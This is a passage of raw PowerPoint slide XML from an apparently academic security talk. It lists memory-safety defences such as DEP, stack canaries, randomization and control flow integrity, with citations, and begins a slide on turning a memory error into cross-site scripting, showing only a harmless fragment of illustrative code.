            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, et al., ASPLOS ’24]</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" i="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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96133F2-F2D9-743C-3049-7EDB71C655B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581911" y="4557572"/>
            <a:ext cx="6068772" cy="1097400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5843733"/>
              <a:gd name="connsiteY0" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX1" fmla="*/ 182904 w 5843733"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX2" fmla="*/ 5660829 w 5843733"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX3" fmla="*/ 5843733 w 5843733"/>
              <a:gd name="connsiteY3" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX4" fmla="*/ 5843733 w 5843733"/>
              <a:gd name="connsiteY4" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX5" fmla="*/ 5660829 w 5843733"/>
              <a:gd name="connsiteY5" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX6" fmla="*/ 182904 w 5843733"/>
              <a:gd name="connsiteY6" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5843733"/>
              <a:gd name="connsiteY7" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5843733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3733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5660829" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5761844" y="0"/>
                  <a:pt x="5843733" y="81889"/>
                  <a:pt x="5843733" y="182904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5843733" y="914496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5843733" y="1015511"/>
                  <a:pt x="5761844" y="1097400"/>
                  <a:pt x="5660829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ADBACB"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1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716" tIns="70716" rIns="70716" bIns="70716" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600" algn="ctr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700" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Control Flow Integrity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" i="0" kern="120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1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Abadi, et al., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tissec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2005], [Houy, et al., TOSEM ‘24]</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" i="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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2A10AD10-2726-41A7-527A-DB535EB9CF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="2143290"/>
            <a:ext cx="4596244" cy="1097400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY0" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX1" fmla="*/ 182904 w 3895822"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX2" fmla="*/ 3712918 w 3895822"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX3" fmla="*/ 3895822 w 3895822"/>
              <a:gd name="connsiteY3" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX4" fmla="*/ 3895822 w 3895822"/>
              <a:gd name="connsiteY4" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX5" fmla="*/ 3712918 w 3895822"/>
              <a:gd name="connsiteY5" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX6" fmla="*/ 182904 w 3895822"/>
              <a:gd name="connsiteY6" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY7" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3895822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822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3712918" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3813933" y="0"/>
                  <a:pt x="3895822" y="81889"/>
                  <a:pt x="3895822" y="182904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3895822" y="914496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3895822" y="1015511"/>
                  <a:pt x="3813933" y="1097400"/>
                  <a:pt x="3712918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44546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31" tIns="103101" rIns="152631" bIns="103101" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>revention</a:t>
            </a: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[Solar Designer, ‘97], [Microsoft, ‘06]</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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8474A811-046F-AC6D-93AB-B50BCE491857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="3350431"/>
            <a:ext cx="4596244" cy="1097400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY0" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX1" fmla="*/ 182904 w 3895822"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX2" fmla="*/ 3712918 w 3895822"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX3" fmla="*/ 3895822 w 3895822"/>
              <a:gd name="connsiteY3" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX4" fmla="*/ 3895822 w 3895822"/>
              <a:gd name="connsiteY4" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX5" fmla="*/ 3712918 w 3895822"/>
              <a:gd name="connsiteY5" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX6" fmla="*/ 182904 w 3895822"/>
              <a:gd name="connsiteY6" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY7" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3895822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822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3712918" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3813933" y="0"/>
                  <a:pt x="3895822" y="81889"/>
                  <a:pt x="3895822" y="182904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3895822" y="914496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3895822" y="1015511"/>
                  <a:pt x="3813933" y="1097400"/>
                  <a:pt x="3712918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44546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31" tIns="103101" rIns="152631" bIns="103101" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ages</a:t>
            </a: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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[Cowan, et al., USENIX Sec ‘98]</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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B7A26127-1628-BBF5-6A26-640A54A41304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="4557572"/>
            <a:ext cx="4596244" cy="1097400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY0" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX1" fmla="*/ 182904 w 3895822"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX2" fmla="*/ 3712918 w 3895822"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX3" fmla="*/ 3895822 w 3895822"/>
              <a:gd name="connsiteY3" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX4" fmla="*/ 3895822 w 3895822"/>
              <a:gd name="connsiteY4" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX5" fmla="*/ 3712918 w 3895822"/>
              <a:gd name="connsiteY5" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX6" fmla="*/ 182904 w 3895822"/>
              <a:gd name="connsiteY6" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY7" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3895822"/>
              <a:gd name="connsiteY8" fmla="*/ 182904 h 109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5822" h="1097400">
                <a:moveTo>
                  <a:pt x="0" y="182904"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="81889"/>
                  <a:pt x="81889" y="0"/>
                  <a:pt x="182904" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3712918" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3813933" y="0"/>
                  <a:pt x="3895822" y="81889"/>
                  <a:pt x="3895822" y="182904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3895822" y="914496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3895822" y="1015511"/>
                  <a:pt x="3813933" y="1097400"/>
                  <a:pt x="3712918" y="1097400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="182904" y="1097400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="81889" y="1097400"/>
                  <a:pt x="0" y="1015511"/>
                  <a:pt x="0" y="914496"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="182904"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="44546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631" tIns="103101" rIns="152631" bIns="103101" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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700" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomization</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2700" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1155700">
              <a:lnSpc>
                <a:spcPts val="9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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" err="1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PaX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Team, ‘01], [Ahmed, et al., USENIX Sec ‘23]</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Grafik 2" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7636632F-7DCB-92E9-84DF-D0A4382D3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62351" y="1985498"/>
            <a:ext cx="783837" cy="7386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36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15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89CA25B-088A-3DEE-1D23-7C48520A1345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7949368" y="2276968"/>
            <a:ext cx="4196418" cy="3819846"/>
            <a:chOff x="7949368" y="2276968"/>
            <a:chExt cx="4196418" cy="3819846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61535C9-8F40-2CFB-7C9E-A4B76687D675}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7949368" y="2458608"/>
              <a:ext cx="4196418" cy="363820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1F43584A-625E-5368-4C8D-0450F6127675}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8169175" y="2626074"/>
              <a:ext cx="3846201" cy="414000"/>
              <a:chOff x="7034135" y="823072"/>
              <a:chExt cx="3415485" cy="344196"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Rechteck: abgerundete Ecken 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BB4FE8B-E339-E329-DE4B-3E5FF2B459C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7034135" y="823073"/>
                <a:ext cx="2244090" cy="344195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/>
                  <a:t>http://CuteCats.com/</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Interaktive Schaltfläche: Zur Startseite wechseln 2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6CC4C61-78D1-F314-28B8-AFBD1D347028}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9342536" y="823073"/>
                <a:ext cx="379329" cy="337053"/>
              </a:xfrm>
              <a:prstGeom prst="actionButtonHome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nteraktive Schaltfläche: Dokument 2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9E01F67-2E55-F012-6CA4-AE6AB1777F48}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9773464" y="823073"/>
                <a:ext cx="315047" cy="337053"/>
              </a:xfrm>
              <a:prstGeom prst="actionButtonDocument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nteraktive Schaltfläche: Zurück oder Vorherige(r) 3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A682DAD-133E-6AEB-3E55-503FF4577C8F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10140110" y="823072"/>
                <a:ext cx="309510" cy="337053"/>
              </a:xfrm>
              <a:prstGeom prst="actionButtonBackPrevious">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="E7E6E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2F4A1472-77FE-447A-9AE3-C4A1A28C923E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8168571" y="2276968"/>
              <a:ext cx="842006" cy="438681"/>
              <a:chOff x="6194550" y="522582"/>
              <a:chExt cx="842006" cy="438681"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Google Shape;316;p34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DD579ED-4E37-56A6-4967-F34CE00560B4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194550" y="522832"/>
                <a:ext cx="421002" cy="4384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" name="Google Shape;317;p34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2386C497-FAC0-E40D-29A4-F9FE03868DC7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615553" y="522582"/>
                <a:ext cx="421003" cy="41321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584F716-07D8-1143-4B20-1321E5E8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noProof="0"/>
              <a:t>From a Memory Error to Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Datumsplatzhalter 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD998C65-922E-F1DC-3E00-BD028107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23DE0C58-49B9-2D8E-56A8-D43AA848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5</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE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E4CDD02-E482-0491-DE92-4264CE0F1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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Mcfadden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, et al., Blackhat 2018] &amp; [Lehmann, et al., USENIX Security 2020]</a:t>
            </a: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0B554F8D-4605-420A-0AC0-1693461207E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1119753" y="1384945"/>
            <a:ext cx="3222730" cy="1391128"/>
            <a:chOff x="1119753" y="1384945"/>
            <a:chExt cx="3222730" cy="1391128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C66871D-21A8-4D9C-5151-F6112529BA38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1119753" y="1384945"/>
              <a:ext cx="3222730" cy="1391128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B646417-FDA5-8EF8-A1C1-199872C8DFA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1508678" y="1405424"/>
              <a:ext cx="24448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External input data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74A9C5C7-D977-7EF1-2614-B4CC123B6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766" y="1799206"/>
            <a:ext cx="683879" cy="718975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C878C90-4606-74E6-DF1D-F7A01975FE28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="213141" y="2847810"/>
            <a:ext cx="4708741" cy="1350251"/>
            <a:chOff x="4537541" y="4825834"/>
            <a:chExt cx="4708741" cy="1350251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8FE7963-0F4A-4CC4-110A-62E4211A9660}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4614559" y="5084407"/>
              <a:ext cx="4631723" cy="1091678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F7E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de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>decodeImage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>imageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Grafik 14" descr="Ein Bild, das gelb, Schrift, Grafiken, Symbol enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CEB679-8A6E-F310-B3EB-DCCCB93CF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537541" y="4825834"/>
              <a:ext cx="601907" cy="63316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B5CFEA2-20F5-4165-F5D7-A9DC368B5440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="74737" y="4053839"/>
            <a:ext cx="5138029" cy="2340419"/>
            <a:chOff x="-101722" y="1252764"/>
            <a:chExt cx="6171410" cy="2340419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5C1CD324-6749-E76E-61CC-1BE875D94DE7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-101721" y="1688951"/>
              <a:ext cx="6171409" cy="190423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de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>string</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> 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tag = 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"&lt;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img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 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src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='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data:image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/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1600" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="CE9178"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>png</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1600" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="CE9178"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>;"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1600" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>void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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>decodeImage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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="4EC9B0"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="8BC2E1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>image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) {</a:t>
              </a:r>
            </a:p>
            <a:p>
